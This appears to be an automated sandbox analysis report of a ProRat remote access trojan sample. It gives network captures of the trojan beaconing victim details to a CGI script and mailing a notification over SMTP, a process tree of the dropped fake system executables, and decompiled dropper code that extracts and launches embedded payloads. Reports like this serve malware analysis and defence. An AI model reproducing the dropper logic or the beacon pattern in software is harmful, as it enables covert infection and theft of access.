Jun 19, 2023 11:19:14.750372887 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:14.816343069 CEST	49702	80	192.168.2.3	178.237.20.14
Jun 19, 2023 11:19:14.944125891 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:14.945908070 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.058228970 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.058259964 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.058713913 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.171734095 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.172094107 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.284811020 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.287089109 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.399435043 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.399888992 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.552448988 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.552596092 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:15.664931059 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.907685041 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:15.908132076 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:16.020448923 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:16.020734072 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:16.020911932 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:16.021013021 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:16.021222115 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:16.021392107 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:16.133445978 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:19:16.133471966 CEST	25	49703	67.195.204.79	192.168.2.3
Jun 19, 2023 11:20:29.721909046 CEST	80	49702	178.237.20.14	192.168.2.3
Jun 19, 2023 11:20:29.722822905 CEST	49702	80	192.168.2.3	178.237.20.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2023 11:19:14.439323902 CEST	52387	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.471978903 CEST	53	52387	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.536247969 CEST	56924	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.542511940 CEST	60625	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.569483042 CEST	53	60625	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.589775085 CEST	60626	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.604387045 CEST	53	60626	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.609461069 CEST	49302	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.609956980 CEST	53	56924	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.629106045 CEST	53	49302	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 19, 2023 11:19:14.439323902 CEST	192.168.2.3	8.8.8.8	0x605	Standard query (0)	you.no-ip.com	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.536247969 CEST	192.168.2.3	8.8.8.8	0x262c	Standard query (0)	www.icq.com	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.542511940 CEST	192.168.2.3	8.8.8.8	0x8628	Standard query (0)	www.yoursite.com	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.589775085 CEST	192.168.2.3	8.8.8.8	0x5a01	Standard query (0)	yahoo.com	MX (Mail exchange)	IN (0x0001)	false
Jun 19, 2023 11:19:14.609461069 CEST	192.168.2.3	8.8.8.8	0xda43	Standard query (0)	mta7.am0.yahoodns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 19, 2023 11:19:14.569483042 CEST	8.8.8.8	192.168.2.3	0x8628	No error (0)	www.yoursite.com		188.114.97.7	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.569483042 CEST	8.8.8.8	192.168.2.3	0x8628	No error (0)	www.yoursite.com		188.114.96.7	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.604387045 CEST	8.8.8.8	192.168.2.3	0x5a01	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Jun 19, 2023 11:19:14.604387045 CEST	8.8.8.8	192.168.2.3	0x5a01	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Jun 19, 2023 11:19:14.604387045 CEST	8.8.8.8	192.168.2.3	0x5a01	No error (0)	yahoo.com			MX (Mail exchange)	IN (0x0001)	false
Jun 19, 2023 11:19:14.609956980 CEST	8.8.8.8	192.168.2.3	0x262c	No error (0)	www.icq.com	www.ovip.icq.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 19, 2023 11:19:14.609956980 CEST	8.8.8.8	192.168.2.3	0x262c	No error (0)	www.ovip.icq.com		178.237.20.14	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)	false
Jun 19, 2023 11:19:14.629106045 CEST	8.8.8.8	192.168.2.3	0xda43	No error (0)	mta7.am0.yahoodns.net		98.136.96.75	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.yoursite.com

www.icq.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49700	188.114.97.7	80	C:\Windows\services.exe

Timestamp	kBytes transferred	Direction	Data
Jun 19, 2023 11:19:14.587142944 CEST	92	OUT	GET http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=11:19:43_AM&servertarihi=6/19/2023&serversifre=123&islem=log HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.yoursite.com Connection: Keep-Alive
Jun 19, 2023 11:19:14.623790979 CEST	94	IN	HTTP/1.1 403 Forbidden Date: Mon, 19 Jun 2023 09:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN cf-mitigated: challenge Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WLK7o68VOp69nP8Nhmk9ynQJdyj%2FOS6ImMdFUmgaDSfgJKoQjUP3xTSYJ7Zhg06s5B9rClo3t8zYHpJVnvLbUa%2B%2Fm0MM9vAlGFF0p%2F4U0Ucxvl1B04%2BYhNYfwOdM4pSkArU0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 7d9ab07429d39a0b-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 66 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dd 59 6b 93 a2 c8 b6 fd 3e bf 82 53 27 e2 58 1d 3d 94 3c 44 a5 a6 9d 09 54 7c a0 80 02 22 70 e7 86 91 40 02 c9 5b 9e e2 89 f9 ef 37 ac ea Data Ascii: fceYk>S'X=<DT\|"p@[7
Jun 19, 2023 11:19:14.623866081 CEST	96	IN	Data Raw: 47 55 75 75 cf bd 11 e7 d3 25 a2 4a 73 ef b5 1f b9 33 49 17 9b 4f ff 98 cb 33 cd dc f1 58 50 25 f1 ef bf 7c ba 7d 60 31 48 fd c9 1d 4c f1 83 7a 77 93 41 e0 fe fe 0b 86 61 d8 a7 0a 55 31 fc 5d a8 cb 0a 03 58 92 25 30 ad 1e 1e 1e 3e f5 9f e5 cf 98 Data Ascii: GUuu%Js3IO3XP%\|}`1HLzwAaU1]X%0>V*FnL+\rx9]/U7@QjrG~,A5?]LA'wEfgUf(u48wl<+V-r`9RT!b8!QaA]qSQ}'qSNYa
Jun 19, 2023 11:19:14.623913050 CEST	97	IN	Data Raw: 50 61 3a a0 ea 4e 51 8f 4d c6 2e d6 cc 6c d9 c9 ab a5 d9 b5 08 87 06 1e 77 78 a2 9f fd 4c a0 f2 93 4c 3a 59 d4 9e cd 71 3d ae 65 be ad 69 63 3e ca 49 c9 d3 ad c8 87 c7 dd 90 50 40 4d 15 8c ab 2c 89 5a cb af 3c e5 68 7b 26 b5 76 3c 9b 8a d1 ea 62 Data Ascii: Pa:NQM.lwxLL:Yq=eic>IP@M,Z<h{&v<bAZZ[%\|wU^a{UAZdFfE:;-N_3bT!6#/Q~Jh1le$XY4(Q\fajmk6_n6'en
Jun 19, 2023 11:19:14.623960972 CEST	98	IN	Data Raw: 86 b1 69 bd 73 a8 98 b0 54 26 b4 29 a2 31 29 37 df 1e 85 dc 46 6c eb 24 6c 67 1a fb fa 26 db 51 42 6e 2f dd dc a1 16 8c 69 08 81 b5 8c 58 83 64 bd db 9f 90 c4 ad 79 54 3a cb 90 f2 9d c6 33 22 1a 5c a4 d0 af 45 34 b8 0a a9 14 3b a9 15 3b e9 b4 71 Data Ascii: isT&)1)7Fl$lg&QBn/iXdyT:3"\E4;;qRiqLrVr[!P!T62be-_DOJ"p+jP4w\|Er}G4"bk/Mijvdx)MuLlC,6<</A+wS
Jun 19, 2023 11:19:14.624011040 CEST	99	IN	Data Raw: 1f 7f 5e 9e 1f aa 57 af 4a 7c bb de cb e4 3e ad e3 f8 57 ec f9 ff ff 2b b2 5d 54 ff 31 be fd f3 22 7f 78 5d e5 db 4d 9a a5 71 06 5c 6c 82 7d 7b 84 7b 87 0d ff ed 7a 64 fe e1 8d f3 17 c7 ec b7 b3 f7 eb 01 e2 c3 ea f3 e9 51 4e 3b 0d f8 12 48 e0 7d Data Ascii: ^WJ\|>W+]T1"x]Mq\l}{{zdQN;H}^~u9y_>g[u{*}~?No
Jun 19, 2023 11:19:14.624059916 CEST	99	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49702	178.237.20.14	80	C:\Windows\services.exe

Timestamp	kBytes transferred	Direction	Data
Jun 19, 2023 11:19:14.667105913 CEST	100	OUT	GET /friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Referer: http://www.icq.com/friendship/pages/send_by_email_18984.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.icq.com Connection: Keep-Alive Cookie: geo=359; adsPopup0=1098232990103
Jun 19, 2023 11:19:14.721769094 CEST	101	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 19 Jun 2023 09:19:14 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Keep-Alive: timeout=75 Location: https://www.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jun 19, 2023 11:19:14.944125891 CEST	25	49703	67.195.204.79	192.168.2.3	220 mtaproxy205.free.mail.bf1.yahoo.com ESMTP ready
Jun 19, 2023 11:19:14.945908070 CEST	49703	25	192.168.2.3	67.195.204.79	HELO ProRat
Jun 19, 2023 11:19:15.058259964 CEST	25	49703	67.195.204.79	192.168.2.3	250 mtaproxy205.free.mail.bf1.yahoo.com
Jun 19, 2023 11:19:15.058713913 CEST	49703	25	192.168.2.3	67.195.204.79	MAIL FROM:<ProRat@Yahoo.Com>
Jun 19, 2023 11:19:15.171734095 CEST	25	49703	67.195.204.79	192.168.2.3	250 sender <ProRat@yahoo.com> ok
Jun 19, 2023 11:19:15.172094107 CEST	49703	25	192.168.2.3	67.195.204.79	RCPT TO:<bmoberman@yahoo.com>
Jun 19, 2023 11:19:15.284811020 CEST	25	49703	67.195.204.79	192.168.2.3	250 recipient <bmoberman@yahoo.com> ok
Jun 19, 2023 11:19:15.287089109 CEST	49703	25	192.168.2.3	67.195.204.79	DATA
Jun 19, 2023 11:19:15.399435043 CEST	25	49703	67.195.204.79	192.168.2.3	354 go ahead
Jun 19, 2023 11:19:15.907685041 CEST	25	49703	67.195.204.79	192.168.2.3	554 5.7.9 Message not accepted for policy reasons. See https://postmaster.yahooinc.com/error-codes
Jun 19, 2023 11:19:15.908132076 CEST	49703	25	192.168.2.3	67.195.204.79	QUIT
Jun 19, 2023 11:19:16.020734072 CEST	25	49703	67.195.204.79	192.168.2.3	221 2.0.0 Bye
Jun 19, 2023 11:19:16.021222115 CEST	49703	25	192.168.2.3	67.195.204.79	QUIT

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 7b8wRbnmKu.exePID: 5676, Parent PID: 3452

General

Target ID:	0
Start time:	11:19:08
Start date:	19/06/2023
Path:	C:\Users\user\Desktop\7b8wRbnmKu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\7b8wRbnmKu.exe
Imagebase:	0x400000
File size:	607602 bytes
MD5 hash:	E39B8C5521C7DF36EE92EAD621A58ED9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: lncom.exePID: 7348, Parent PID: 5676

General

Target ID:	4
Start time:	11:19:11
Start date:	19/06/2023
Path:	C:\Windows\SysWOW64\lncom.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\lncom.exe"
Imagebase:	0x400000
File size:	347692 bytes
MD5 hash:	B0692CE1EEE360FD4F246BDA4355BCFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7476, Parent PID: 5676

General

Target ID:	5
Start time:	11:19:11
Start date:	19/06/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\7B8WRB~1.EXE.bat
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: fservice.exePID: 7496, Parent PID: 7348

General

Target ID:	6
Start time:	11:19:12
Start date:	19/06/2023
Path:	C:\Windows\SysWOW64\fservice.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\fservice.exe
Imagebase:	0x400000
File size:	347692 bytes
MD5 hash:	B0692CE1EEE360FD4F246BDA4355BCFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7504, Parent PID: 7476

General

Target ID:	7
Start time:	11:19:12
Start date:	19/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: services.exePID: 7544, Parent PID: 7496

General

Target ID:	8
Start time:	11:19:12
Start date:	19/06/2023
Path:	C:\Windows\services.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\services.exe -XP
Imagebase:	0x400000
File size:	347692 bytes
MD5 hash:	B0692CE1EEE360FD4F246BDA4355BCFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 7b8wRbnmKu.exePID: 5676, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	93.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	51.6%
Total number of Nodes:	31
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011B0 Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 443
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004011B0() {
				signed int _t76;
				int _t80;
				int _t82;
				int _t84;
				int _t87;
				int _t89;
				int _t91;
				void* _t111;
				struct _IO_FILE* _t112;
				void* _t116;
				char* _t119;
				struct _IO_FILE* _t120;
				char* _t125;
				void* _t132;
				signed int _t148;
				void* _t160;
				void* _t161;
				void* _t166;
				intOrPtr _t170;
				signed int _t173;
				unsigned int _t175;
				signed int _t176;
				CHAR* _t218;
				unsigned int _t220;
				signed int _t221;
				CHAR* _t270;
				char* _t287;
				void* _t292;
				void* _t335;
				long _t336;
				void* _t337;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				struct _IO_FILE* _t390;
				struct _IO_FILE* _t391;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t396;
				void* _t398;
				struct _IO_FILE* _t399;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t408;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t416;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t423;
				void* _t426;
				void* _t427;
				void* _t430;

				GetModuleFileNameA(0, _t402 + 0x22c, 0x104);
				_t76 = fopen(_t402 + 0x23c, 0x401048); // executed
				_t399 = _t76;
				_t403 = _t402 + 8;
				if(_t399 != 0) {
					_push(_t403 + 0x23c);
					_push(0x38);
					_push(0x37);
					_push(0x61);
					_push(0x63);
					_push(0x61);
					_push(0x6d);
					_push(0x74);
					_push(0x61);
					_t160 = E004010C0(_t76);
					_t4 = _t160 + 8; // 0x8
					fseek(_t399, _t4, 0); // executed
					_t80 = getc(_t399);
					_t6 = _t160 + 9; // 0x9
					 *( *(_t403 + 0x684)) = _t80; // executed
					fseek(_t399, _t6, 0); // executed
					_t404 = _t403 + 0x40;
					_t82 = getc(_t399);
					_t8 = _t160 + 0xa; // 0xa
					 *( *((intOrPtr*)(_t404 + 0x654)) + 1) = _t82;
					fseek(_t399, _t8, 0); // executed
					_t84 = getc(_t399);
					_t170 =  *((intOrPtr*)(_t404 + 0x664));
					 *(_t170 + 2) = _t84;
					_t12 = _t160 + 0xb; // 0xb
					 *((char*)(_t170 + 3)) = 0;
					fseek(_t399, _t12, 0); // executed
					_t87 = getc(_t399);
					_t15 = _t160 + 0xc; // 0xc
					 *( *(_t404 + 0x678)) = _t87; // executed
					fseek(_t399, _t15, 0); // executed
					_t89 = getc(_t399);
					_t17 = _t160 + 0xd; // 0xd
					 *( *((intOrPtr*)(_t404 + 0x688)) + 1) = _t89;
					fseek(_t399, _t17, 0); // executed
					_t405 = _t404 + 0x40;
					_t91 = getc(_t399);
					_t173 =  *(_t405 + 0x658);
					_t406 = _t405 + 4;
					 *(_t173 + 2) = _t91;
					 *((char*)(_t173 + 3)) = 0;
					GetSystemDirectoryA(_t406 + 0xdc, 0x64);
					asm("repne scasb");
					_t175 =  !(_t173 | 0xffffffff);
					_t385 = _t406 + 0xdc - _t175;
					_t176 = _t175 >> 2;
					memcpy(_t385 + _t176 + _t176, _t385, memcpy(_t406 + 0x78, _t385, _t176 << 2) & 0x00000003);
					_t408 = _t406 + 0x18;
					asm("repne scasb");
					_t386 = _t408 + 0xdc;
					memcpy(_t386 + 0x175b75a, _t386, memcpy(_t406 + 0x14, _t386, 0 << 2) & 0x00000003);
					asm("repne scasb");
					_t387 = "\\lncom.exe";
					asm("repne scasb");
					memcpy(_t408 + 0x78 - 1, _t387, 0 << 2);
					_t411 = _t408 + 0x24;
					 *0x4017ec = _t411 + 0x78;
					memcpy(_t387 + 0x175b75a, _t387, 0);
					_t412 = _t411 + 0xc;
					asm("repne scasb");
					_t388 = "\\lncom_.";
					asm("repne scasb");
					memcpy(_t412 + 0x14 - 1, _t388, 0 << 2);
					_t413 = _t412 + 0xc;
					memcpy(_t388 + 0x175b75a, _t388, 0);
					_t414 = _t413 + 0xc;
					asm("repne scasb");
					_t389 =  *(_t414 + 0x654);
					asm("repne scasb");
					memcpy(_t413 + 0x14 - 1, _t389, 0 << 2);
					_t111 = memcpy(_t389 + 0x175b75a, _t389, 0);
					_t416 = _t414 + 0x18;
					 *0x4017e8 = _t111;
					_t112 = fopen(_t416 + 0x7c, 0x401058); // executed
					_t390 = _t112;
					_t417 = _t416 + 8;
					if(_t390 != 0) {
						_t39 = _t160 + 0xe; // 0xe
						fseek(_t399, _t39, 0); // executed
						_push(_t417 + 0x248);
						_push(0x38);
						_push(0x37);
						_push(0x69);
						_push(0x6e);
						_push(0x69);
						_push(0x74);
						_push(0x6f);
						_push(0x66);
						_t335 = E004010C0(_t417 + 0x248);
						_t418 = _t417 + 0x30;
						_t41 = _t335 - _t160 - 0xe; // -14
						_t116 = _t41;
						if(_t116 > 0) {
							_t166 = _t116;
							do {
								 *((char*)(_t418 + 0x14)) = getc(_t399);
								putc( *(_t418 + 0x18) & 0x000000ff, _t390); // executed
								_t418 = _t418 + 0xc;
								_t166 = _t166 - 1;
							} while (_t166 != 0);
						}
						fclose(_t390); // executed
						_t336 = _t335 + 8;
						fseek(_t399, _t336, 0);
						_t119 =  *0x4017e8; // 0x19f624
						_t120 = fopen(_t119, 0x401058); // executed
						_t391 = _t120;
						_t419 = _t418 + 0x18;
						if(_t391 != 0) {
							_t161 = 0;
							while(( *(_t399 + 0xc) & 0x00000010) == 0) {
								getc(_t399); // executed
								_t419 = _t419 + 4;
								_t161 = _t161 + 1;
							}
							fseek(_t399, _t336, 0);
							_t50 = _t161 - 2; // -1
							_t337 = _t50;
							_t420 = _t419 + 0xc;
							if(_t337 > 0) {
								do {
									 *((char*)(_t420 + 0x14)) = getc(_t399);
									putc( *(_t420 + 0x18) & 0x000000ff, _t391); // executed
									_t420 = _t420 + 0xc;
									_t337 = _t337 - 1;
								} while (_t337 != 0);
							}
							fclose(_t391);
							_t287 =  *0x4017e8; // 0x19f624
							_t421 = _t420 + 4;
							ShellExecuteA(0, "open", _t287, 0, 0, 5);
							_t125 =  *0x4017ec; // 0x19f688
							ShellExecuteA(0, "open", _t125, 0, 0, 5); // executed
							_t218 = _t421 + 0x548;
							GetModuleFileNameA(0, _t218, 0x104);
							asm("repne scasb");
							_t220 =  !(_t218 | 0xffffffff);
							_t393 = _t421 + 0x548 - _t220;
							_t221 = _t220 >> 2;
							_t132 = memcpy(_t393 + _t221 + _t221, _t393, memcpy(_t421 + 0x140, _t393, _t221 << 2) & 0x00000003);
							_t423 = _t421 + 0x18;
							asm("repne scasb");
							 *(0 + _t421 + 0x140 - 3) = _t132;
							asm("repne scasb");
							_t394 = _t423 + 0x140;
							_t292 =  *(_t423 + 0x654);
							memcpy(_t394 + 0x175b75a, _t394, memcpy(_t423 + 0x444, _t394, 0 << 2) & 0x00000003);
							asm("repne scasb");
							_t395 = _t292;
							asm("repne scasb");
							memcpy(_t421 + 0x444 - 1, _t395, 0 << 2);
							_t426 = _t423 + 0x24;
							memcpy(_t395 + 0x175b75a, _t395, 0);
							_t427 = _t426 + 0xc;
							asm("repne scasb");
							_t396 = _t427 + 0x140;
							memcpy(_t396 + 0x175b75a, _t396, memcpy(_t426 + 0x340, _t396, 0 << 2) & 0x00000003);
							asm("repne scasb");
							asm("repne scasb");
							memcpy(_t427 + 0x344 - 1, 0x40104c, 0 << 2);
							_t430 = _t427 + 0x24;
							memcpy(0x1b5c7a6, 0x40104c, 0);
							asm("repne scasb");
							_t398 = _t292;
							asm("repne scasb");
							memcpy(_t430 + 0x344 - 1, _t398, 0 << 2);
							memcpy(_t398 + 0x175b75a, _t398, 0);
							_t270 =  *0x4017e8; // 0x19f624
							_t148 = CopyFileA(_t270, _t430 + 0x460, 1); // executed
							asm("sbb eax, eax");
							return  ~_t148 + 2;
						} else {
							return 0xfffffffd;
						}
					} else {
						return 0xfffffffe;
					}
				} else {
					return _t76 | 0xffffffff;
				}
			}

0x004011c9
0x004011dc
0x004011e2
0x004011e4
0x004011e9
0x00401200
0x00401201
0x00401203
0x00401205
0x00401207
0x00401209
0x0040120b
0x0040120d
0x0040120f
0x0040121c
0x00401220
0x00401225
0x0040122e
0x00401237
0x0040123e
0x00401240
0x00401242
0x00401246
0x0040124f
0x00401256
0x00401259
0x0040125c
0x0040125e
0x00401267
0x0040126a
0x0040126f
0x00401273
0x00401276
0x0040127f
0x00401286
0x00401288
0x0040128b
0x00401294
0x0040129b
0x0040129e
0x004012a0
0x004012a4
0x004012a6
0x004012ad
0x004012b0
0x004012bd
0x004012c1
0x004012d7
0x004012d9
0x004012df
0x004012e1
0x004012f3
0x004012f3
0x004012ff
0x00401307
0x0040131b
0x00401325
0x0040132b
0x00401334
0x0040133c
0x0040133c
0x00401347
0x0040134c
0x0040134c
0x0040135c
0x00401362
0x0040136b
0x00401373
0x00401373
0x0040137e
0x0040137e
0x0040138a
0x00401390
0x00401399
0x004013a1
0x004013b1
0x004013b1
0x004013b7
0x004013bd
0x004013c3
0x004013c5
0x004013ca
0x004013dc
0x004013e3
0x004013f0
0x004013f1
0x004013f3
0x004013f5
0x004013f7
0x004013f9
0x004013fb
0x004013fd
0x004013ff
0x00401406
0x00401408
0x0040140f
0x0040140f
0x00401414
0x00401416
